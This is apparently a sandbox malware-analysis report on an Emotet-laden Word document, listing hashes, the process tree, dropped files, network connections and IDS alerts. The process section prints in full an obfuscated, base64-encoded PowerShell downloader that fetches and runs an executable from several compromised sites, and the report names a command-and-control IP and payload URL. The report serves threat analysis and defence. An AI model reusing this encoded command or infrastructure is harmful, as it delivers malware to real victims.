analyze malware
  • Huge database of samples and IOCs
  • Custom VM setup
  • Unlimited submissions
  • Interactive approach
Sign up, it’s free
File name:

b17ab279f6cc1ce3814ab9710c75cb23.bin

Full analysis: https://app.any.run/tasks/1b7cbc53-d4d9-4717-bf1c-5b3d5627728c
Verdict: Malicious activity
Threats:

Emotet is one of the most dangerous trojans ever created. Over the course of its lifetime, it was upgraded to become a very destructive malware. It targets mostly corporate victims but even private users get infected in mass spam email campaigns.

Analysis date: September 30, 2020, 03:18:28
OS: Windows 7 Professional Service Pack 1 (build: 7601, 32 bit)
Tags:
macros
macros-on-open
generated-doc
emotet-doc
emotet
opendir
loader
trojan
Indicators:
MIME: application/msword
File info: Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.2, Code page: 1252, Title: Et., Author: Antoine Morel, Template: Normal.dotm, Revision Number: 1, Name of Creating Application: Microsoft Office Word, Create Time/Date: Mon Sep 28 22:18:00 2020, Last Saved Time/Date: Mon Sep 28 22:18:00 2020, Number of Pages: 1, Number of Words: 3380, Number of Characters: 19268, Security: 8
MD5:

B17AB279F6CC1CE3814AB9710C75CB23

SHA1:

CAD3526283208665D583EBC2987D8A18403CA46F

SHA256:

81931603DBB92F78032227C21C6BCC3A3DFE98352C81D885A9C28D8FE622B957

SSDEEP:

1536:mxRD3bNqfNpu39IId5a6XP3Mg8afyqTTqc380Y:ER1qf69xak3Mgxy2qI80Y

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.
  • MALICIOUS

    • Application was dropped or rewritten from another process

      • Onj2qmzt.exe (PID: 2060)
      • ws2_32.exe (PID: 856)
    • Connects to CnC server

      • ws2_32.exe (PID: 856)
    • EMOTET was detected

      • ws2_32.exe (PID: 856)
    • Changes the autorun value in the registry

      • ws2_32.exe (PID: 856)
  • SUSPICIOUS

    • Executable content was dropped or overwritten

      • POwersheLL.exe (PID: 1720)
      • Onj2qmzt.exe (PID: 2060)
    • Creates files in the user directory

      • POwersheLL.exe (PID: 1720)
    • PowerShell script executed

      • POwersheLL.exe (PID: 1720)
    • Executed via WMI

      • POwersheLL.exe (PID: 1720)
    • Starts itself from another location

      • Onj2qmzt.exe (PID: 2060)
    • Connects to server without host name

      • ws2_32.exe (PID: 856)
    • Reads Internet Cache Settings

      • ws2_32.exe (PID: 856)
  • INFO

    • Reads Microsoft Office registry keys

      • WINWORD.EXE (PID: 2444)
    • Creates files in the user directory

      • WINWORD.EXE (PID: 2444)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.

TRiD

.doc | Microsoft Word document (54.2)
.doc | Microsoft Word document (old ver.) (32.2)

EXIF

FlashPix

Title: Et.
Subject: -
Author: Antoine Morel
Keywords: -
Comments: -
Template: Normal.dotm
LastModifiedBy: -
RevisionNumber: 1
Software: Microsoft Office Word
TotalEditTime: -
CreateDate: 2020:09:28 21:18:00
ModifyDate: 2020:09:28 21:18:00
Pages: 1
Words: 3380
Characters: 19268
Security: Locked for annotations
Company: -
Lines: 160
Paragraphs: 45
CharCountWithSpaces: 22603
AppVersion: 15
ScaleCrop: No
LinksUpToDate: No
SharedDoc: No
HyperlinksChanged: No
TitleOfParts: -
HeadingPairs:
  • Title
  • 1
CodePage: Unicode UTF-16, little endian
LocaleIndicator: 1033
CompObjUserTypeLen: 32
CompObjUserType: Microsoft Word 97-2003 Document
No data.
screenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
40
Monitored processes
4
Malicious processes
3
Suspicious processes
0

Behavior graph

Click at the process to see the details
start drop and start drop and start winword.exe no specs powershell.exe onj2qmzt.exe #EMOTET ws2_32.exe

Process information

PID
CMD
Path
Indicators
Parent process
2444"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\AppData\Local\Temp\b17ab279f6cc1ce3814ab9710c75cb23.bin.doc"C:\Program Files\Microsoft Office\Office14\WINWORD.EXEexplorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft Word
Version:
14.0.6024.1000
1720POwersheLL -ENCOD JABNAHYAbQA5AHgAZABwAD0AKAAoACcARwB2AHkANgAnACsAJwB0ACcAKwAnAF8AJwApACsAJwA4ACcAKQA7AC4AKAAnAG4AZQB3AC0AaQAnACsAJwB0AGUAbQAnACkAIAAkAGUATgB2ADoAVQBzAEUAUgBwAHIATwBGAGkATABlAFwAVAA0AFkAeQBlAFIAOABcAGgASgBfAE0ARgBaAFYAXAAgAC0AaQB0AGUAbQB0AHkAcABlACAARABJAHIAZQBjAHQAbwBSAFkAOwBbAE4AZQB0AC4AUwBlAHIAdgBpAGMAZQBQAG8AaQBuAHQATQBhAG4AYQBnAGUAcgBdADoAOgAiAHMAZQBjAGAAVQByAGkAYABUAGAAWQBwAFIATwBgAFQATwBDAE8ATAAiACAAPQAgACgAJwB0AGwAJwArACgAJwBzACcAKwAnADEAMgAsACAAdABsAHMAJwArACcAMQAxACwAJwApACsAJwAgACcAKwAnAHQAbAAnACsAJwBzACcAKQA7ACQAQgAzAHUAbwBuAHQAMQAgAD0AIAAoACgAJwBPAG4AagAnACsAJwAyACcAKQArACgAJwBxACcAKwAnAG0AegAnACkAKwAnAHQAJwApADsAJABJAGQAdAA2ADQAZQBuAD0AKAAoACcARAA4ACcAKwAnADMAaAAnACkAKwAoACcANAAnACsAJwB1AHkAJwApACkAOwAkAFoAcgB0AG8AMwA2AGYAPQAkAGUAbgB2ADoAdQBzAGUAcgBwAHIAbwBmAGkAbABlACsAKAAoACcAYwAnACsAJwBHACcAKwAoACcATAAnACsAJwBUADQAJwApACsAKAAnAHkAJwArACcAeQBlACcAKQArACgAJwByACcAKwAnADgAYwAnACkAKwAnAEcAJwArACgAJwBMACcAKwAnAEgAagBfACcAKQArACgAJwBtACcAKwAnAGYAegB2AGMARwBMACcAKQApAC4AIgBSAGUAYABQAEwAQQBDAGUAIgAoACgAWwBDAGgAYQByAF0AOQA5ACsAWwBDAGgAYQByAF0ANwAxACsAWwBDAGgAYQByAF0ANwA2ACkALAAnAFwAJwApACkAKwAkAEIAMwB1AG8AbgB0ADEAKwAoACcALgAnACsAKAAnAGUAJwArACcAeABlACcAKQApADsAJABJAG8AdAA1AGMAegBrAD0AKAAoACcATQAnACsAJwAzADMAcQA2ADAAJwApACsAJwBmACcAKQA7ACQATgByAG8AbQBvAGcAcgA9AC4AKAAnAG4AJwArACcAZQAnACsAJwB3AC0AbwBiAGoAZQBjAHQAJwApACAAbgBFAFQALgB3AGUAQgBDAEwASQBFAG4AdAA7ACQARQBvADYAMQB4AGMAbwA9ACgAKAAnAGgAdAB0AHAAJwArACcAOgAnACsAJwAvACcAKQArACcALwAnACsAJwBlACcAKwAnAGQAdQAnACsAJwAuAGoAJwArACgAJwBtAHMAJwArACcAdgAnACkAKwAoACcAYwBsAGEAcwBzAC4AYwBvAG0AJwArACcALwAnACsAJwB3AHAALQBpAG4AJwArACcAYwAnACkAKwAoACcAbAB1AGQAJwArACcAZQBzACcAKQArACcALwBzACcAKwAoACcAWgAnACsAJwBtAGoAJwApACsAKAAnAFMAcQAnACsAJwAvACoAJwArACcAaAB0ACcAKQArACcAdABwACcAKwAnADoAJwArACcALwAnACsAKAAnAC8AJwArACcAZABhAHIAJwApACsAJwBrACcAKwAoACcAYgBsAGUAcwAnACsAJwBzACcAKQArACcAaQBuACcAKwAoACcAZwAuACcAKwAnAG4AZQAnACkAKwAoACcAdAAvAGUAJwArACcANAB3AGYAdAAnACkAKwAnAGsAJwArACcAcABuACcAKwAoACcALwBLAE4AQQBPADkALwAqAGgAdAB0AHAAOgAvAC8AdAAnACsAJwByAGEAJwArACcAbgAnACsAJwBjAGkAJwArACcAcwAnACsAJwBjAG8AbgBzACcAKQArACgAJwB1ACcAKwAnAGwAdABpACcAKQArACcAbgBnACcAKwAnAC4AYwAnACsAJwBvAG0AJwArACgAJwAvACcAKwAnAHcAcAAtAGEAJwApACsAJwBkACcAKwAoACcAbQBpAG4ALwAnACsAJwBFAEUAJwApACsAJwBvAEYAJwArACcALwAqACcAKwAoACcAaAB0AHQAcAAnACsAJwA6AC8ALwAnACsAJwBkAGUAdgBhAG4AJwArACcAeQBhAHMAJwArACcAdABvAHIAZQAnACkAKwAoACcALgBjACcAKwAnAG8AJwApACsAJwBtAC8AJwArACcAdwAnACsAKAAnAHAALQBjAG8AJwArACcAbgAnACsAJwB0AGUAJwApACsAJwBuACcAKwAoACcAdAAvACcAKwAnADkASgA1ADYAJwApACsAJwBqAHUAJwArACcAQQAnACsAKAAnAC8AJwArACcAKgBoAHQAJwArACcAdABwACcAKQArACcAOgAvACcAKwAnAC8AaAAnACsAKAAnAGUAJwArACcAYQBsAHQAaABjAHUAJwArACcAcgBlACcAKQArACcAYQAnACsAKAAnAHQAJwArACcAaABvAG0AJwApACsAKAAnAGUALgAnACsAJwBjAG8AbQAnACsAJwAvACcAKQArACgAJwBBAEwARgAnACsAJwBBAF8AJwApACsAJwBEAEEAJwArACcAVAAnACsAKAAnAEEALwAnACsAJwBpACcAKQArACgAJwBLACcAKwAnAFMAZAAnACkAKwAnAEMAJwArACgAJwBLACcAKwAnADYALwAqAGgAJwArACcAdAB0ACcAKwAnAHAAOgAnACkAKwAnAC8ALwAnACsAJwB3AHcAJwArACcAdwAnACsAJwAuAHMAJwArACgAJwB6AHcAJwArACcAeQAnACkAKwAnAG0AJwArACgAJwBhAGwAJwArACcAbAAuACcAKQArACcAYwAnACsAKAAnAG8AJwArACcAbQAvACcAKQArACcAdwAnACsAJwBwACcAKwAoACcALQAnACsAJwBjAG8AJwApACsAKAAnAG4AdABlACcAKwAnAG4AJwArACcAdAAvACcAKQArACcAagAnACsAKAAnADIAJwArACcAOQBtACcAKQArACgAJwB2ACcAKwAnAFMALwAqAGgAdAB0ACcAKwAnAHAAOgAvACcAKQArACgAJwAvAHcAdwAnACsAJwB3AC4AJwApACsAKAAnAGoAbwByAG4AYwBvAC4AYwBvACcAKwAnAG0AJwArACcALwB3ACcAKwAnAHAAJwArACcALQAnACkAKwAnAGEAJwArACgAJwBkACcAKwAnAG0AaQBuACcAKQArACgAJwAvACcAKwAnAFUAVAAwACcAKQArACgAJwB4AEIAJwArACcASgB3AC8AJwApACkALgAiAHMAYABwAGwASQB0ACIAKABbAGMAaABhAHIAXQA0ADIAKQA7ACQAVgBtAGwAXwA4AHIAcQA9ACgAKAAnAEgAJwArACcAeQBvACcAKQArACgAJwBkAGUAJwArACcAbAAyACcAKQApADsAZgBvAHIAZQBhAGMAaAAoACQAQgBrAHUAXwB0AGQAXwAgAGkAbgAgACQARQBvADYAMQB4AGMAbwApAHsAdAByAHkAewAkAE4AcgBvAG0AbwBnAHIALgAiAEQAYABvAGAAdwBuAEwATwBhAGQAZgBpAGwARQAiACgAJABCAGsAdQBfAHQAZABfACwAIAAkAFoAcgB0AG8AMwA2AGYAKQA7ACQAUABuAGYAOQBmAHoAdAA9ACgAKAAnAFYAZwBvAGEAJwArACcAbgAnACkAKwAnADkAJwArACcAbQAnACkAOwBJAGYAIAAoACgALgAoACcARwBlACcAKwAnAHQALQBJAHQAZQBtACcAKQAgACQAWgByAHQAbwAzADYAZgApAC4AIgBMAEUAYABOAGcAYABUAEgAIgAgAC0AZwBlACAAMgAzADIANQAzACkAIAB7AC4AKAAnAEkAbgB2AG8AJwArACcAawBlAC0ASQAnACsAJwB0AGUAbQAnACkAKAAkAFoAcgB0AG8AMwA2AGYAKQA7ACQAWABvAHEAaQB5AHIANQA9ACgAKAAnAEIAdQBvACcAKwAnAGwAaAAnACkAKwAnAGkAZgAnACkAOwBiAHIAZQBhAGsAOwAkAFkANgByADUAaAAxAGUAPQAoACcAUwAnACsAJwBmACcAKwAoACcAMgBkAHEAJwArACcAZABuACcAKQApAH0AfQBjAGEAdABjAGgAewB9AH0AJABGAG0AaQA5AGsAdgA5AD0AKAAnAEkAXwAnACsAKAAnAGQAZgBlACcAKwAnAG0AeAAnACkAKQA= C:\Windows\System32\WindowsPowerShell\v1.0\POwersheLL.exe
wmiprvse.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Exit code:
0
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
2060"C:\Users\admin\T4yyer8\Hj_mfzv\Onj2qmzt.exe" C:\Users\admin\T4yyer8\Hj_mfzv\Onj2qmzt.exe
POwersheLL.exe
User:
admin
Company:
Flex Inc.
Integrity Level:
MEDIUM
Description:
Replacement for the Masked Edit Control v 2.0.
Exit code:
0
Version:
2.8.0.3
856"C:\Users\admin\AppData\Local\fveapibase\ws2_32.exe"C:\Users\admin\AppData\Local\fveapibase\ws2_32.exe
Onj2qmzt.exe
User:
admin
Company:
Flex Inc.
Integrity Level:
MEDIUM
Description:
Replacement for the Masked Edit Control v 2.0.
Version:
2.8.0.3
Total events
2 386
Read events
1 491
Write events
0
Delete events
0

Modification events

No data
Executable files
2
Suspicious files
2
Text files
0
Unknown types
3

Dropped files

PID
Process
Filename
Type
2444WINWORD.EXEC:\Users\admin\AppData\Local\Temp\CVRA76C.tmp.cvr
MD5:
SHA256:
1720POwersheLL.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\KJ1P4RT9KSKP3BEZ2WZ3.temp
MD5:
SHA256:
2060Onj2qmzt.exeC:\Users\admin\AppData\Local\Temp\~DFA9D4C92913C62F7F.TMP
MD5:
SHA256:
2444WINWORD.EXEC:\Users\admin\AppData\Local\Temp\VBE\MSForms.exdtlb
MD5:E0630E08A606A04C2F46D442F9B2B0CA
SHA256:483B6B6F721FA16FA91AAB1FC4C5A3DA378645FE10625EFD1D3C133A755E2495
1720POwersheLL.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-msbinary
MD5:4028388263805ABA00088A0BA4EEA515
SHA256:5A67495439D515C063CD1732C649C5ADA72E7C0056CA8B6CD70A49F80643B948
2444WINWORD.EXEC:\Users\admin\AppData\Roaming\Microsoft\Templates\~$Normal.dotmpgc
MD5:DB7ED30F2AF244B37602E9A8FA40BC69
SHA256:6C261EB204362985E24872BAC097DA758424FC98F9EA7C6D717C17385EC5961A
2060Onj2qmzt.exeC:\Users\admin\AppData\Local\fveapibase\ws2_32.exeexecutable
MD5:FCBC43EB3A077DE8FA0B57742D400019
SHA256:30F38A07BB3F8776FD9A6916045C995D2538132681DB655BC5DF65B2F5258E2F
1720POwersheLL.exeC:\Users\admin\T4yyer8\Hj_mfzv\Onj2qmzt.exeexecutable
MD5:FCBC43EB3A077DE8FA0B57742D400019
SHA256:30F38A07BB3F8776FD9A6916045C995D2538132681DB655BC5DF65B2F5258E2F
1720POwersheLL.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms~RF3bb1dc.TMPbinary
MD5:4028388263805ABA00088A0BA4EEA515
SHA256:5A67495439D515C063CD1732C649C5ADA72E7C0056CA8B6CD70A49F80643B948
2444WINWORD.EXEC:\Users\admin\AppData\Local\Temp\~$7ab279f6cc1ce3814ab9710c75cb23.bin.docpgc
MD5:61B8EE7986559953FDC614D071BB6507
SHA256:9179F42EEA8EB595E6338E5A5ABF1E4C2E28DACA04035A028A04C0FE0FBD7E69
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
2
TCP/UDP connections
2
DNS requests
1
Threats
0

HTTP requests

PID
Process
Method
HTTP Code
IP
URL
CN
Type
Size
Reputation
856
ws2_32.exe
POST
200
104.193.103.61:80
http://104.193.103.61/IpeQl8lBFU5v4UZ/6omZz6bAQwMw/
US
binary
132 b
malicious
1720
POwersheLL.exe
GET
200
160.153.210.213:80
http://edu.jmsvclass.com/wp-includes/sZmjSq/
US
executable
400 Kb
suspicious
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
856
ws2_32.exe
104.193.103.61:80
Delcom, Inc.
US
malicious
1720
POwersheLL.exe
160.153.210.213:80
edu.jmsvclass.com
GoDaddy.com, LLC
US
suspicious

DNS requests

Domain
IP
Reputation
edu.jmsvclass.com
  • 160.153.210.213
suspicious

Threats

PID
Process
Class
Message
1720
POwersheLL.exe
A Network Trojan was detected
ET POLICY Terse Named Filename EXE Download - Possibly Hostile
1720
POwersheLL.exe
Potential Corporate Privacy Violation
ET POLICY PE EXE or DLL Windows file download HTTP
1720
POwersheLL.exe
Potentially Bad Traffic
ET INFO Executable Retrieved With Minimal HTTP Headers - Potential Second Stage Download
1720
POwersheLL.exe
Misc activity
ET INFO EXE - Served Attached HTTP
1720
POwersheLL.exe
A Network Trojan was detected
ET POLICY Terse Named Filename EXE Download - Possibly Hostile
856
ws2_32.exe
A Network Trojan was detected
ET TROJAN Win32/Emotet CnC Activity (POST) M10
No debug info